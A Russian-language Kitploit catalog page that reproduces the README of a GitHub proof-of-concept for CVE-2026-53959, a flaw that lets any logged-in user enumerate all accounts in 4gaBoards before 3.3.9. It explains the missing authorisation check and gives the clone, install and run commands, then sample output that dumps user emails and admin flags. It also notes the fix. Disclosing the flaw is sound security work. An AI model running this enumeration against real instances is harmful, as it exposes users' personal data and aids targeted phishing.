Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-53959 — 4gaBoards < 3.3.9 - Раскрытие информации о пользователях | Kitploit
Инструменты/GitHubGitHub/anirbala98/cve-2026-53959
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииВеб-безопасностьТестирование на ПроникновениеОбучение и ОбразованиеБезопасность API
GitHubanirbala98/cve-2026-53959

CVE-2026-53959

4gaBoards < 3.3.9 - Раскрытие информации о пользователях

Репозиторий
11 день назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-53959 - 4gaBoards < 3.3.9 - Раскрытие информации о пользователях

Этот репозиторий содержит эксплойт Proof of Concept (PoC) для CVE-2026-53959

Дисклеймер

Этот проект предоставлен исключительно в образовательных целях и для авторизованного тестирования безопасности. Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет разрешения.

Обзор

4gaBoards — это система досок для управления проектами в реальном времени. До версии 3.3.9 4gaBoards позволяет любому аутентифицированному пользователю перечислять информацию об учётных записях всех пользователей через GET /api/users и получать произвольные учётные записи через GET /api/users/:id. Действия users/index и users/show полагаются только на политику по умолчанию is-authenticated в server/config/policies.js, а server/api/controllers/users/index.js возвращает результат sails.helpers.users.getMany() без проверки авторизации запрашивающего пользователя и без санитизации ответа. Ответы раскрывают email, phone, organization, name, isAdmin, ssoGoogleEmail, ssoGithubEmail и другие поля email, связанные с SSO, включая данные администраторов. Это позволяет перечислять всех пользователей инстанса, приводит к потере конфиденциальности и создаёт возможности для целевой фишинговой разведки. Эта проблема исправлена в версии 3.3.9.

Затронутые версии

КомпонентВерсия
Уязвимая версия<=3.3.8
Исправленная версия3.3.9

Требования

  • Python 3.13.14
  • Requests 2.32.5

Установка

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2026-53959.git
cd CVE-2026-53959/
pip install -r requirements.txt

Использование

root@kitploit:~
python exploit.py <base_url>
python exploit.py http://localhost:3000

Пример

root@kitploit:~
└─$ python exploit.py http://localhost:3000
[*] Creating a new user...
[+] Registration successful! 
[+] Retrieved Access Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IjRjOTE1NzNmLTY5YzktNGQ5OS04ZWUxLWQ1ODZjNzZkNzAyZiJ9.eyJpYXQiOjE3ODcxMjExNzUsInN1YiI6IjE4NDQ5MDI5OTc5OTQyNDMzNTAiLCJleHAiOjE4MTg2NTcxNzV9.OwNTyxE-JS0pztbX4sLz0uzu3GjeyETNFQVbGVxzXxA

[*] Dumping user information...

{"items":[{"id":"1844837973439284230","createdAt":"2026-08-19T04:23:44.000Z","updatedAt":null,"email":"[email protected]","isAdmin":true,"isVerified":false,"name":"Demo Demo","username":"demo","phone":null,"organization":null,"ssoGoogleEmail":null,"ssoGithubUsername":null,"ssoGithubEmail":null,"ssoMicrosoftEmail":null,"ssoOidcEmail":null,"lastLogin":"2026-08-19T06:29:23.463Z","lastEmailVerificationRequestAt":null,"deletedAt":null,"createdById":"1844837973439284230","updatedById":null,"deletedById":null,"isPasswordAuthenticated":true,"avatarUrl":null},{"id":"1844902997994243350","createdAt":"2026-08-19T06:32:55.000Z","updatedAt":null,"email":"[email protected]","isAdmin":false,"isVerified":false,"name":"test","username":null,"phone":null,"organization":null,"ssoGoogleEmail":null,"ssoGithubUsername":null,"ssoGithubEmail":null,"ssoMicrosoftEmail":null,"ssoOidcEmail":null,"lastLogin":null,"lastEmailVerificationRequestAt":null,"deletedAt":null,"createdById":"1844902997994243350","updatedById":null,"deletedById":null,"isPasswordAuthenticated":true,"avatarUrl":null}]}

Меры по устранению

Обновите 4gaBoards до версии 3.3.9 или выше.

Ссылки

  • https://www.tenable.com/cve/CVE-2026-53959
  • https://github.com/RARgames/4gaBoards/security/advisories/GHSA-p77f-p47g-h72p
Скачать инструмент